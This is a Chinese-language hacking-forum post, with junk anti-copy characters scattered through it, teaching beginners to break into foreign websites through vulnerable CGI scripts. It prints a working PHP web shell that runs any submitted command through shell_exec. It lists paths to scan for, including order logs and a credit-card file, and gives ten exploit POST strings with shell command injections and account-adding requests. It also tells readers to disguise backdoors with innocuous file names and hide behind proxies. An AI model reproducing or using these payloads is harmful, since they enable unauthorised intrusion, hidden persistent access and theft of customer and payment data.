CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
; ^  T# f! ?& {大家好 我是bboyhip  只是一名菜菜的exploiter
很开心来到贵论坛
, j' e6 A: I# f% G  w6 }3 ~' i这里让我感觉 很有技术交流的感觉
% O( @' l1 D( H0 k# f9 u我会长长来玩的
2 e- x% }% }5 y, p% m2 C3 w前言:
以下讲解针对欧美日本网站
+ [5 [) n; f8 v, ^, Z7 ]2 K當我們在做滲透分析的時候 方法有很多
我门都知道 国外伺服器大多是linux 平台
所以有很多网站程序有6成都会使用cgi 脚本来管理
目录为/cgi-bin/
3 ?! V7 m( b5 C5 r4 ]. ?
只是个人在实务上一些经验
: N: G3 o" R/ u6 v8 |写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
$ e. ?' r: B7 G' k讲解一下
( _' q, A  C' [6 q3 c5 q" L让没有基础的人很容易上手
, \+ O! v, ^! S- Q! Q; g
以下内容跟帖回复才能看到
==============================
' w" ^9 J8 \2 q2 Q5 J6 T( H7 I! L7 |1 G
第1部份: 何谓Shell?
Shell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
4 t6 F: H+ ~" i! g6 o! B/ F% x" k
( `, y. [; Z+ `- U' I3 x对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
% {4 k3 x  z8 N, A5 F) C要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
. |; N4 I9 N8 ~" E! I所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

# W: m. U5 s6 u' ?第2部份: Unix 指令
  Z- |; _. G: N8 }7 C  L以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
! e+ V1 \) v: T! _( F9 o) X1 _0 V如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
  @) r% z* ?' v, nls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
ls ../ -al: 详细列出上一层的资料夹及档案
cat: 显示档案内容
" E1 H' Q8 E/ j5 ^/ s! j8 \9 icat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
who: 显示谁login 至系统
" v4 `* p4 ~- Oman: 显示指令用法  
man ls: 显示ls这指令的用法  
* I: P, m/ ^, k" P. q& Z( xmkdir 建立目录
rmdir 删除目录
6 f/ W* L9 L. w. V  W* V1 Hmv 移动档案
rm 删除档案
! ^, @; w  k+ r% S0 i5 X. M* _, @
第3部份: Shell的使用
例如:
http://site.com/refer.php
这是我的後门, 原代码如下:
; x# J3 g# R7 X6 Y* Q2 j. x<Form Action="#" Method="POST">
; m3 Q& s. j4 n, N# Z<Input type="text" name="cmd">
<Input type="Submit">
</Form>
<?php
) f. S2 r3 `, Z4 m$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
echo $Output;
?>
输入pwd, 可得到绝对路径:
5 f3 |! l6 Y# i$ s6 Z1 W0 g/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com

第4部份: 注意事项
3 @( o( C: t3 k8 Y- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
0 E6 c0 L, w6 \3 R9 {5 k; S- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
6 Q1 _; a  P5 p/ w不容易被发现.
- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
+ x& Y+ w: m, h4 w! i% n针对网站的渗透分析方法太多了
这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
开始讲解脚本入侵过程:
在这里提供一些方法思路让大家学习一下
0 t. @, ^3 R9 p* }7 r
( h. ~, i; o; B- U) F" a3 m0 ?) D1.一开始对一个网站进行cgi漏洞扫描
我们需要的东西有
% g7 A. L. q1 n扫洞工具 如:triton..等等
5 U8 T* ?* \* }( d$ XE表
如
/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
/Admin_files/order.log
1 T+ p1 y3 x  b! o! T2 ~/orders/mountain.cfg
( `' {1 P  M; Z* H4 }+ r; P' K/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
2 W" r# H7 J( A' iE表来源可以是网路收寻或是自己的0 day
6 k! B: [' w2 W7 `  M4 L! l! q
2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
. k6 X* R( O7 ^* c- ]3 p* _4 T# n1 G一般都是在IE里先看一下的,记住这个返回码哦
4 R! h9 L6 ^" \. k! FERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
可以是源代码分析 找出介质
5 C4 W. y* N' u/ F% K( q5 t或是用抓包工具 抓他的语法...等等

以下我提供10个 cgi 洞以及使用方法post
: u( `! x- e1 ^' a2 @让大家可以针对网站去做扫描  
/index.cgi
: p: n2 J( Y7 w6 ~+ L( x: @wei=ren&gen=command
- B/ V& q- \7 z' N/ K( o/passmaster.cgi
+ w& d9 Y0 L) t' L& a" _& P' `( `7 AAction=Add&Username=Username&Password=Password
* d" ~' x$ B; n/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
0 l6 ~$ c9 b5 F1 p/ K/form.cgi
" c+ }. R4 I' [+ L- G$ gname=xxxx&email=email&subject=xxxx&response=|echo;ls|
7 B/ Y/ c' ]9 W4 E: i/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
' R; i9 k! n4 B: w# [0 q& I/ }! puser=username&pass=Password&confirm=Password
/ccbill-local.asp
post_values=username:password
- U9 X" C7 Q' t0 t5 b9 }/count.cgi
pinfile=|echo;ls -la;exit|
/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
5 u8 n9 u% n" \0 @/verotelrum.pl
9 e1 R9 E6 }& C6 Pvercode=username:password:dseegsow:add:amount<&30>
* e6 Q) }5 S4 D8 m+ [) U5 `/af.cgi_browser_out=|echo;ls -la;exit;|

  [: M2 N( d0 R# d) e: P' r+ Z今天就讲到这  感谢大家支持
9 W" j8 j  D, _. I' y) M9 c& a